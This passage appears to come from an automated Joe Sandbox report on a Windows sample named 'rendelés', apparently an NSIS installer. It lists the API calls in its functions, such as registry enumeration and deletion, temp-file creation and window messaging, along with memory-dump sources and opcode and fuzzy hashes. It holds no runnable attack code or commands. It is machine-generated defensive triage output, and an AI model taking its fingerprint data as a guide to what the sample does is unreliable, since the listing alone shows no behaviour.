                                                                • Associated: 00000002.00000002.3278841900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278872247.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278886220.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278913333.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_400000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID: ItemTextlstrlenwsprintf
                                                                • String ID: %u.%u%s%s$H7B
                                                                • API String ID: 3540041739-107966168
                                                                • Opcode ID: 9c55475845004576d56970086a3160dc1853a6ea3782dd039902276dcfc99cf4
                                                                • Instruction ID: 20619224473e8c08b4fba53027c62ddcf1c3fef784a2ba69f514aa474de30786
                                                                • Opcode Fuzzy Hash: 9c55475845004576d56970086a3160dc1853a6ea3782dd039902276dcfc99cf4
                                                                • Instruction Fuzzy Hash: 1A11D8736041283BDB00A5ADDC45E9F3298AB81338F150637FA26F61D1EA79882182E8
                                                                APIs
                                                                • CharNextW.USER32(?,*?|<>/":,00000000,00000000,75923420,00437800,?,0040361B,00437800,00437800,00403923), ref: 00406952
                                                                • CharNextW.USER32(?,?,?,00000000,?,0040361B,00437800,00437800,00403923), ref: 00406961
                                                                • CharNextW.USER32(?,00000000,75923420,00437800,?,0040361B,00437800,00437800,00403923), ref: 00406966
                                                                • CharPrevW.USER32(?,?,75923420,00437800,?,0040361B,00437800,00437800,00403923), ref: 00406979
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.3278856863.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000002.00000002.3278841900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278872247.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278886220.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278913333.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_400000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID: Char$Next$Prev
                                                                • String ID: *?|<>/":
                                                                • API String ID: 589700163-165019052
                                                                • Opcode ID: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
                                                                • Instruction ID: d28fb8c2eefe6f61a155ceb01790bbf8b21f4710aa7989e54d8eeb8481a577c9
                                                                • Opcode Fuzzy Hash: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
                                                                • Instruction Fuzzy Hash: 2611089580061295DB303B18CC40BB762F8AF99B50F12403FE98A776C1E77C4C9286BD
                                                                APIs
                                                                • lstrcatW.KERNEL32(00000000,00000000,0040A5F8,00436000,?,?,00000031), ref: 004017B0
                                                                • CompareFileTime.KERNEL32(-00000014,?,0040A5F8,0040A5F8,00000000,00000000,0040A5F8,00436000,?,?,00000031), ref: 004017D5
                                                                  • Part of subcall function 00406668: lstrcpynW.KERNEL32(?,?,00000400,004037B0,00429260,NSIS Error), ref: 00406675
                                                                  • Part of subcall function 004056CA: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                                  • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                                  • Part of subcall function 004056CA: lstrcatW.KERNEL32(00422728,004030A8,004030A8,00422728,00000000,00000000,00000000), ref: 00405725
                                                                  • Part of subcall function 004056CA: SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                                                                  • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                                  • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                                  • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.3278856863.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000002.00000002.3278841900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278872247.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278886220.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278913333.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_400000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                • String ID:
                                                                • API String ID: 1941528284-0
                                                                • Opcode ID: 453958bc0cd1b2dd253e880fcd992b37c005c95db4a67daf6dea3c0e9c97f409
                                                                • Instruction ID: 87dd38174d63fc88252c3cacf76d35d2aef1a13c6195c1d88e2760da23471212
                                                                • Opcode Fuzzy Hash: 453958bc0cd1b2dd253e880fcd992b37c005c95db4a67daf6dea3c0e9c97f409
                                                                • Instruction Fuzzy Hash: DE41B771500205BACF10BBB5CD85DAE7A75EF45328B20473FF422B21E1D63D89619A2E
                                                                APIs
                                                                • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402EFD
                                                                • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
                                                                • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
                                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
                                                                • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.3278856863.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000002.00000002.3278841900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278872247.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278886220.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278913333.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_400000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID: CloseEnum$DeleteValue
                                                                • String ID:
                                                                • API String ID: 1354259210-0
                                                                • Opcode ID: 2f5760c81b9bdb573da93a40119b3bcbbfe2770e9a6cbc48a05e82d61b54c679
                                                                • Instruction ID: 37c7ba0f9c491dd7f389852fcb35a119484072d927876f68e32cbd91f0a54eef
                                                                • Opcode Fuzzy Hash: 2f5760c81b9bdb573da93a40119b3bcbbfe2770e9a6cbc48a05e82d61b54c679
                                                                • Instruction Fuzzy Hash: 6D216B7150010ABBDF11AF94CE89EEF7B7DEB50384F110076F909B21E0D7B49E54AA68
                                                                APIs
                                                                • GetDlgItem.USER32(?,?), ref: 00401D9A
                                                                • GetClientRect.USER32(?,?), ref: 00401DE5
                                                                • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E15
                                                                • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
                                                                • DeleteObject.GDI32(00000000), ref: 00401E39
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.3278856863.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000002.00000002.3278841900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278872247.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278886220.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278913333.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_400000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                • String ID:
                                                                • API String ID: 1849352358-0
                                                                • Opcode ID: 100b3177012869429c2005611ce111630833f28d1ab152a2d5a2575cfc39775b
                                                                • Instruction ID: 4d725fdcf847a80329c23b38d7164c003567f542edd6fcacfb34c9ebeef40da9
                                                                • Opcode Fuzzy Hash: 100b3177012869429c2005611ce111630833f28d1ab152a2d5a2575cfc39775b
                                                                • Instruction Fuzzy Hash: 67212672904119AFCB05CBA4DE45AEEBBB5EF08304F14003AF945F62A0CB389951DB98
                                                                APIs
                                                                • GetDC.USER32(?), ref: 00401E51
                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                                                                • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
                                                                • ReleaseDC.USER32(?,00000000), ref: 00401E84
                                                                  • Part of subcall function 004066A5: lstrcatW.KERNEL32(00428200,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                                                                  • Part of subcall function 004066A5: lstrlenW.KERNEL32(00428200,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4
                                                                • CreateFontIndirectW.GDI32(0040CDF8), ref: 00401ED3
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.3278856863.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000002.00000002.3278841900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278872247.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278886220.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278913333.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_400000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
                                                                • String ID:
                                                                • API String ID: 2584051700-0
                                                                • Opcode ID: da8e727cde32dbac5ba0c7db49ef74d213bcb2a0e3f4fe6d3c107a90d4fe1e84
                                                                • Instruction ID: b9cc094806d22c325402cb6ccb5f5134c2025175c414775df3ff87de861ccae2
                                                                • Opcode Fuzzy Hash: da8e727cde32dbac5ba0c7db49ef74d213bcb2a0e3f4fe6d3c107a90d4fe1e84
                                                                • Instruction Fuzzy Hash: 8401B571900241EFEB005BB4EE89A9A3FB0AB15301F208939F541B71D2C6B904459BED
                                                                APIs
                                                                • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
                                                                • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.3278856863.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000002.00000002.3278841900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278872247.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278886220.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278913333.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_400000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$Timeout
                                                                • String ID: !
                                                                • API String ID: 1777923405-2657877971
                                                                • Opcode ID: b183ccb6ab3284ced798d12f720e161a9248df31e23c89b80f307d5b894ef539
                                                                • Instruction ID: e1c20d37316975b9b94706f7b3abd8da4b7b3b5136eece5bd2aa3cbae88a6c19
                                                                • Opcode Fuzzy Hash: b183ccb6ab3284ced798d12f720e161a9248df31e23c89b80f307d5b894ef539
                                                                • Instruction Fuzzy Hash: 28219E7190420AEFEF05AFA4D94AAAE7BB4FF44304F14453EF601B61D0D7B88941CB98
                                                                APIs
                                                                • CreateDirectoryW.KERNEL32(?,?,00437800), ref: 00405BDC
                                                                • GetLastError.KERNEL32 ref: 00405BF0
                                                                • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405C05
                                                                • GetLastError.KERNEL32 ref: 00405C0F
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.3278856863.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000002.00000002.3278841900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278872247.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278886220.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278913333.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_400000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                • String ID:
                                                                • API String ID: 3449924974-0
                                                                • Opcode ID: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
                                                                • Instruction ID: 886f74eda6482ab63e8fe18d08a652fea41827dc0a526659a7d7b5e138c44e4e
                                                                • Opcode Fuzzy Hash: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
                                                                • Instruction Fuzzy Hash: 95010871D04219EAEF009FA1CD44BEFBBB8EF14314F04403ADA44B6180E7789648CB99
                                                                APIs
                                                                  • Part of subcall function 00406668: lstrcpynW.KERNEL32(?,?,00000400,004037B0,00429260,NSIS Error), ref: 00406675
                                                                  • Part of subcall function 00405FE2: CharNextW.USER32(?,?,00425F50,?,00406056,00425F50,00425F50,75923420,?,75922EE0,00405D94,?,75923420,75922EE0,00000000), ref: 00405FF0
                                                                  • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 00405FF5
                                                                  • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 0040600D
                                                                • lstrlenW.KERNEL32(00425F50,00000000,00425F50,00425F50,75923420,?,75922EE0,00405D94,?,75923420,75922EE0,00000000), ref: 00406098
                                                                • GetFileAttributesW.KERNEL32(00425F50,00425F50,00425F50,00425F50,00425F50,00425F50,00000000,00425F50,00425F50,75923420,?,75922EE0,00405D94,?,75923420,75922EE0), ref: 004060A8
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.3278856863.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000002.00000002.3278841900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278872247.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278886220.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278913333.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_400000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                • String ID: P_B
                                                                • API String ID: 3248276644-906794629
                                                                • Opcode ID: 900e3a3aedd828ccf636743a116f58552bc6887dcb5d3e9637a901da882d1290
                                                                • Instruction ID: df110f430b83b9381375b5fd3fa67f6c4419d4890c6468873e0fced3c2676832
                                                                • Opcode Fuzzy Hash: 900e3a3aedd828ccf636743a116f58552bc6887dcb5d3e9637a901da882d1290
                                                                • Instruction Fuzzy Hash: 0DF07826144A1216E622B23A0C05BAF05098F82354B07063FFC93B22E1DF3C8973C43E
                                                                APIs
                                                                • IsWindowVisible.USER32(?), ref: 0040566D
                                                                • CallWindowProcW.USER32(?,?,?,?), ref: 004056BE
                                                                  • Part of subcall function 00404610: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404622
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.3278856863.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000002.00000002.3278841900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278872247.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278886220.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278913333.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_400000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID: Window$CallMessageProcSendVisible
                                                                • String ID:
                                                                • API String ID: 3748168415-3916222277
                                                                • Opcode ID: a73dc4e993bde12ea44745026bd4b5676165c6f206d332bc9731ab0fc1b08652
                                                                • Instruction ID: 537e1cae7e4c88fb21f4f8cfd237bdd46b0b38e99f2a5e053ca6ba0093d9a5c8
                                                                • Opcode Fuzzy Hash: a73dc4e993bde12ea44745026bd4b5676165c6f206d332bc9731ab0fc1b08652
                                                                • Instruction Fuzzy Hash: 4401B171200608AFEF205F11DD84A6B3A35EB84361F904837FA08752E0D77F8D929E6D
                                                                APIs
                                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,0040A230,00000000,('B,00000000,?,?,00428200,?,?,0040679D,80000002), ref: 0040657C
                                                                • RegCloseKey.ADVAPI32(?,?,0040679D,80000002,Software\Microsoft\Windows\CurrentVersion,?,00428200,?,00000000,00422728), ref: 00406587
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.3278856863.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000002.00000002.3278841900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278872247.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278886220.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278913333.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_400000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID: CloseQueryValue
                                                                • String ID: ('B
                                                                • API String ID: 3356406503-2332581011
                                                                • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                                • Instruction ID: 52dd0fe420a7c1e2827d1a164217834099ee72e945ce70567094b216899e5676
                                                                • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                                • Instruction Fuzzy Hash: C4017C72500209FADF21CF51DD09EDB3BA8EF54364F01803AFD1AA2190D738D964DBA4
                                                                APIs
                                                                • GetTickCount.KERNEL32 ref: 004061A5
                                                                • GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,?,0040363E,00437000,00437800,00437800,00437800,00437800,00437800,00437800,00403923), ref: 004061C0
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.3278856863.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000002.00000002.3278841900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278872247.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278886220.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278913333.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_400000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID: CountFileNameTempTick
                                                                • String ID: nsa
                                                                • API String ID: 1716503409-2209301699
                                                                • Opcode ID: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
                                                                • Instruction ID: 21b676f9b33da427d45e0b2d6905a63b6509bf3d89a4e990effff8b21c6fdcbe
                                                                • Opcode Fuzzy Hash: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
                                                                • Instruction Fuzzy Hash: C3F09076700214BFEB008F59DD05E9AB7BCEBA1710F11803AEE05EB180E6B0A9648768
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.3301552932.00000000357C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 357C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_357c0000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $]q$$]q$$]q$$]q
                                                                • API String ID: 0-858218434
                                                                • Opcode ID: 3d5f70227a9dcc344bd5eefba7ea94147047f551008825e77e2bf8fc77e30b6f
                                                                • Instruction ID: a2fdad309c5c71259383812843c517f25009eb72c1a97c3ed8ba571292c4fd97
                                                                • Opcode Fuzzy Hash: 3d5f70227a9dcc344bd5eefba7ea94147047f551008825e77e2bf8fc77e30b6f
                                                                • Instruction Fuzzy Hash: FDB13934A002188FDB18EFA9C594A9EB7F3FF88344F648569D406AB355DB75DC82CB80
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.3278856863.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000002.00000002.3278841900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278872247.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278886220.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278913333.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_400000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9f3cc98df1e3ecd253cf91825a4064c55af45d063240f038e3dc270cc3f81a7c
                                                                • Instruction ID: 10cc2cc0f2c892254e5285b7a8bac4c216a70fda8fb68dfa7c3680dd08f727d3
                                                                • Opcode Fuzzy Hash: 9f3cc98df1e3ecd253cf91825a4064c55af45d063240f038e3dc270cc3f81a7c
                                                                • Instruction Fuzzy Hash: 55A15571E04228DBDF28CFA8C8547ADBBB1FF44305F10842AD856BB281D778A986DF45
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.3278856863.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000002.00000002.3278841900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278872247.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278886220.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278913333.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_400000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 97748a737734167d5846b9d8dd4738ada3f75d0b833fdafa89234df63502b4a5
                                                                • Instruction ID: d49815ad38d406b3cd0a1a90ea7be1526168d9e39684835ffa6a026ef1ef4849
                                                                • Opcode Fuzzy Hash: 97748a737734167d5846b9d8dd4738ada3f75d0b833fdafa89234df63502b4a5
                                                                • Instruction Fuzzy Hash: 91913270D04228DBEF28CF98C8547ADBBB1FF44305F14816AD856BB281D778A986DF45
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.3278856863.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000002.00000002.3278841900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278872247.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278886220.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278913333.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_400000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 93c083d05bcdf6195ca23c2a54f1652f9efbc2f2339d63ff2f761c89645e7c92
                                                                • Instruction ID: 0a676f48c9952aad729ccf503b6a86ce95496029d8c73069f89f3073be052f6e
                                                                • Opcode Fuzzy Hash: 93c083d05bcdf6195ca23c2a54f1652f9efbc2f2339d63ff2f761c89645e7c92
                                                                • Instruction Fuzzy Hash: C3813471D08228DFDF24CFA8C8847ADBBB1FB44305F24816AD456BB281D778A986DF05
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.3278856863.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000002.00000002.3278841900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278872247.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278886220.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278913333.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_400000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 42fe04b556333c9da529a864bcd0db0a91825228453d2ef5331aa29539740558
                                                                • Instruction ID: 41bbaa2e3590000dceee7c9791d291245bc26db239967492cd44d063337b5de0
                                                                • Opcode Fuzzy Hash: 42fe04b556333c9da529a864bcd0db0a91825228453d2ef5331aa29539740558
                                                                • Instruction Fuzzy Hash: 3E814831D08228DBEF28CFA8C8447ADBBB1FF44305F14816AD856B7281D778A986DF45
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.3278856863.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000002.00000002.3278841900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278872247.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278886220.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278913333.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_400000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7ccf24f4e081119859c9f0e48baaaa1d38e3934f3a3b1d8a87677b84cb71901f
                                                                • Instruction ID: 4a3513360c1d1cc4287bdabe5afcaa460628bed3c0d7ae87261646ca99be8a9f
                                                                • Opcode Fuzzy Hash: 7ccf24f4e081119859c9f0e48baaaa1d38e3934f3a3b1d8a87677b84cb71901f
                                                                • Instruction Fuzzy Hash: 0D711271D04228DBEF28CF98C9947ADBBF1FB44305F14806AD856B7280D738A986DF05
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.3278856863.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000002.00000002.3278841900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278872247.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278886220.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000002.00000002.3278913333.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_400000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c68610f165bc536a6a66ce61bc987e677a2aaa57ebbfa987bd426c3fc0f92c56
